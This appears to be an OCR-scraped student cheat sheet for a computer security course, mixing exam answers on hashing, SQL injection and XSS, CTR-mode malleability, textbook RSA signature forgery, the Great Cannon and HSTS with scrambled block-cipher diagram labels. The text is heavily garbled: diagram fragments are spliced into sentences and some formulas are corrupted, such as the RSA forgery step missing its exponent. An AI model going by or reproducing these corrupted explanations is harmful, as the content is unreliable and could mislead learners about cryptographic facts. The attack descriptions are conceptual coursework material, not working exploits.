388CheatSheet

Short Answer (a) [3 points] What is the difference between hashing and encryption? Give an example RSA like OAEP ENCRYPT THEN MAC algorithm of each (specifying its type) and a situation in which you would use each. Ciph er Block Chainin g (CBC) Solution: Hashing is a one-way operation, while encryption is intended to be reversed To fix, let's make each block rely on the previous: with (and only with) the requisite key. Hash functions (e.g., MD-5, SHA-1, SHA-256, Plaintext Plaintext Plaintext (Banssnsnanann (Baanssananann Basanssasasn to convey messages confidentially. etc.) are used, for example, in the process of assuring message integrity, where they | | iaization vector (v) are used to construct HMACSs. Encryption algorithms (e.g., AES, RSA, etc.) are used | CHOIID—=& ® & [3 points] At a high level, describe how SQL injection and XSS attacks work. Then, state one key similarity and one key difference between the two attacks. Solution: SQL injection occurs when a server interprets untrusted input as part of a SQL statement, typically due to forming a SQL expression by string concatenation without proper escaping. XSS occurs when a server allows untrusted input to be executed as JavaScript in a browser, again due to inadequate escaping or filtering. The key similarity is that untrusted data is inadvertently executed as code. SQL injection attacks typically take place server-side, while XSS attacks can be reflected (client-side) or stored (server-side) but always execute code client-side. [3 points] Suppose the message uses CTR mode, and consider a MiTM attacker who can . guess the destination account number. How can they subvert the protocol to steal money? ~ Problem still? At a high level, how should we change Shushmail to fix this? block cipher block cipher block cipher I Key encryption Key encryption Key encryption Ciphertext Ciphertext OIITITIITIT] [EEEEEEEEEEEEE] ITIITITTIT] Ciphert Cipher Block Chaining (CBC) mode encryption ‘ Cipher Block Chaining (CBC) Electronic Codebook (ECB) Solution: CTR mode encryption is malleable. An attacker who knows the message format and the original account number a can change the message to account number Bassasanssseg Sassassassang ERLTITEEHEL . . - . . ‘ - ‘ - s b by XORing a @ b with that portion of the ciphertext. To fix this, the protocol should Key_, ,@y_, Key_, Plaintext Plaintext Plaintext add integrity protection by MACing the ciphertext. l l l The bank decides to add another layer of protections by requiring customers to confirm s e | Bfeint transactions by logging into its website using RSA signatures. They use textbook RSA (with no Electronic Codebook (ECB) mode encryption hashing or padding). In order to log in, the customer simply needs to submit any message that is accompanied by a valid signature made with their private key. (d) [2 points] You’ve managed to find the bank’s CEO’s public key (e, N) on the company website. How could you use this information to log in as the CEO? Electronic Codebook (ECB) By construction, s is a valid signature for m. Solution: For a random s, compute m = s mod N and submit m and s to the server. Alternatively, sendm = 1 and s = 1 orm = 0 and s = 0. In both cases, s¢ = m for all e. (f) [2 points] Propose a stronger scheme based on HMAC, and briefly argue why it is better. Solution: In place of SHA-256, use HMAC-SHA-256 with a randomly chosen key k. Either plan to keep k well protected or discard it before releasing the data. (b) [1 point] What property of the IP protocol does the Great Cannon exploit to make the client believe that its response packets originated from Baidu? Solution: IP sources are not authenticated, so the GC can simply put Baidu’s IP address in the src_addr field in order to make it appear that its packets are coming from Baidu. ) [1 point] What property of the TCP protocol does the Great Cannon exploit to allow it to inject traffic into the HTTP connection? Solution: TCP does not include cryptographic integrity or confidentiality protection, exposing data to reading and manipulation by an on-path attacker like the GC. (d) [2 points] To prevent its users from becoming part of a GC-style attack, Baidu could enable HTTPS for all resources. Name and describe two additional steps it would need to take to ensure that all connections, including those from first-time users, were protected. Solution: 1. Send an HSTS header to prevent SSLstripping attacks. 2. Add its domain to the HSTS-preload list to protect first-time users. Padding Oracle Attack Ciphertext Ciphertext Ciphertext (NENNEEENEEEEE] (NENNEENNENEEE] (NENENENNEEEEE] | block cipher | block cipher block cipher Key decryption oy ey decryption Initialization Vector (1V) O —§ OITTTITITTTT] Plaintext Plaintext Plaintext Cipher Block Chaining (CBC) mode decryption g Counter (CTR) Effectively a stream cipher! Nonce Counter Nonce Counter Nonce Counte c59bcf35. 00000000 c59bcf35. 00000001 c59bcf35. 0000000: om0 OO 000007001111 l ¢ l block cipher block cipher block cipher or—| ‘ot | noton | " | ot | Plaintext ? Plaintext (NNNNENENEEEEE] ? Plaintext OOIIITITTITT) (NENNNNEENNREE] OTTITTITTTT7 OITTTTTTTTT] OTITTTTTTTTT] Ciphertext Ciphertext Ciphei Counter (CTR) mode encryption m